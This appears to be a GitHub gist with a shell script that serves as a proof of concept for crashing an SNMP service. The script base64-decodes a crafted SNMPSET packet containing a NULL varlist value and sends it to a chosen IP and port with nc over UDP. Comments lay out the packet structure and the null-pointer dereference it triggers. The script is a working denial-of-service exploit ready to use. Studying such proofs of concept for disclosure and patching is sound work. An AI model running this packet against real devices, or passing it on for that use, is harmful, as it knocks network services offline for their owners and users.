Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/bin/sh
############### PoC for SNMP DDoS vulnerability ###############
# null-pointer-ref during handle SNMP requeset
# craft an SNMPSET packet with NULL varlist data
#SEQUENCE (3 elem)
# INTEGER 1
# OCTET STRING (7 byte) private
# [3] (4 elem)
# INTEGER 1732466076
# INTEGER 0
# INTEGER 0
# SEQUENCE (1 elem)
# SEQUENCE (2 elem)
# OBJECT IDENTIFIER 1.3.6.1.2.1.4.2.0
# NULL
if [ "$#" -ne 2 ]; then
echo "Usage: ./snmp_ddos_ipttl.sh IP PORT"
fi
IP=$1
PORT=$2
echo "MCoCAQEEB3ByaXZhdGWjHAIEZ0NVnAIBAAIBADAOMAwGCCsGAQIBBAIABQA=" | base64 -d | nc -u $IP $PORT
exit 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment